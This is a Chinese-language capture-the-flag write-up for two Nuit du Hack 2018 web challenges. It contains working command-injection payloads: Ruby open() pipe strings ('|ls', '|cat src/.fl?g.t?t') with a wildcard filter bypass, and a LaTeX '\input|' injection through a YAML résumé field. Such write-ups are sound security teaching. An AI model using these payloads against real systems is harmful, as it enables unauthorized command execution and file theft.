Nuit du Hack CTF Quals 2018 writeup (web)

以下是2道比较简单的web类题目
- Crawl me maybe! (100)
- Linked Out (300)

Crawl me maybe!

打开网站,看到只有一个搜索框
Nuit du Hack CTF Quals 2018 writeup (web)_第1张图片

测试了一下百度,得到了一堆css。查看网络请求,发现向result处post了url。通过wappalyzer分析网站是用ruby写的,这里想办法让它报错。
url[]=1
通过向url赋值一个数组的形式,让它抛异常可以得到Nuit du Hack CTF Quals 2018 writeup (web)_第2张图片
可以看到匹配了”flag” “txt” “*” ,且必须同时出现”|” 与”cat”或”ls”
nil和python里的None基本相同。可以猜测文件名大概是flag.txt
url=|ls -a src
Nuit du Hack CTF Quals 2018 writeup (web)_第3张图片

url=|cat src/.flag.txt

果然禁止访问了
Nuit du Hack CTF Quals 2018 writeup (web)_第4张图片
也被禁止了,我们不能用fla的方式查看。那怎么做呢?
实际有很多方式绕过,这里我选一种最简单的也是我立刻想到的

url=|cat src/.fl?g.t?t

得到Nuit du Hack CTF Quals 2018 writeup (web)_第5张图片

Linked Out

这道题的大概意思是通过上传一个写好的yml文件,通过latex模板生成对应的简历。是一道latex引发的命令执行问题。
这里有一篇paper:https://0day.work/hacking-with-latex/

我们通过

skype: BBBBBBBBBBBBBB}\skype{\input|"ls /"}%

的方式覆盖原字段并闭合路径
src
可以发现成功注入代码,看到了flag,那来cat一下

skype: BBBBBBBBBBBBBB}\skype{\input|"cat flag"}%

blank
看来得转一下码:

skype: BBBBBBBBBBBBBB}\skype{\input|"cat flag|base64 "}%

flag
然后base64转码得到flag

摘自https://tipi-hack.github.io/2018/04/01/quals-NDH-18-linked-out.html

你可能感兴趣的:(Nuit du Hack CTF Quals 2018 writeup (web))